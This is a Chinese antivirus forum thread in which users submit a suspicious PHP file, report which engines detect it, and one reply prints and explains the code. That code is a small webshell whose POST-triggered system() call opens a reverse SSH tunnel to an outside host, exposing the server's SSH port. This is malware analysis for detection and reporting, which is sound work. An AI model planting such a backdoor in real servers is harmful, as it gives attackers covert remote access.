查看: 1204|回复: 8
收起左侧

[可疑文件] 可疑php文件

[复制链接]
wenbo
发表于 2022-4-20 09:51:12 | 显示全部楼层 |阅读模式
微步报毒(看行为也看不出为什么要报)
VT目前1/58


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
11111111111445
发表于 2022-4-20 09:54:21 | 显示全部楼层
安天miss,火狐浏览器报毒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
救命稻草
发表于 2022-4-20 09:54:42 | 显示全部楼层
腾讯每次这种格式的都报
bananas12138
发表于 2022-4-20 11:19:16 | 显示全部楼层
火绒报后门病毒
wwwab
发表于 2022-4-20 11:24:15 | 显示全部楼层
卡巴
Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Backdoor.PHP.WebShell.us
Thank you for your help.
hackerbob
发表于 2022-4-20 13:15:54 | 显示全部楼层
本帖最后由 hackerbob 于 2022-4-21 11:43 编辑

是php小马
针对的是linux服务器
php代码分析:

  1. <?php
  2. if (isset($_POST['connect'])) {
  3.   system('ssh cdu-reverse-ssh@staff.zycdut.net -p32022 -N -T -R 43022:localhost:22 > /dev/null &');
  4. }
  5. ?>

  6. <?php
  7. system('ps -fU www-data');
  8. ?>
复制代码
isset($_POST['connect'])
接收表单数据,判断表单中是否有connect项,这是密码
如果有则执行下面这条命令


system('ssh cdu-reverse-ssh@staff.zycdut.net -p32022 -N -T -R 43022:localhost:22 > /dev/null &');
运行shell命令,远程连接  staff.zycdut.net 这个域名 , 端口是32022
system('ps -fU www-data')
也是运行shell命令,显示进程 www-data
其余的都不是php代码,是前端页面代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 2022-4-20 17:54:55 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Tom179090
发表于 2022-4-20 18:27:10 | 显示全部楼层
本帖最后由 Tom179090 于 2022-4-20 19:28 编辑

过BD。已上报。
The analysis of the file has been completed.

The file is malicious and detection will be added in the next couple of updates.



846472713
发表于 2022-4-20 18:48:31 | 显示全部楼层
G DATA 未报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-7 16:27 , Processed in 0.130902 second(s), 22 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表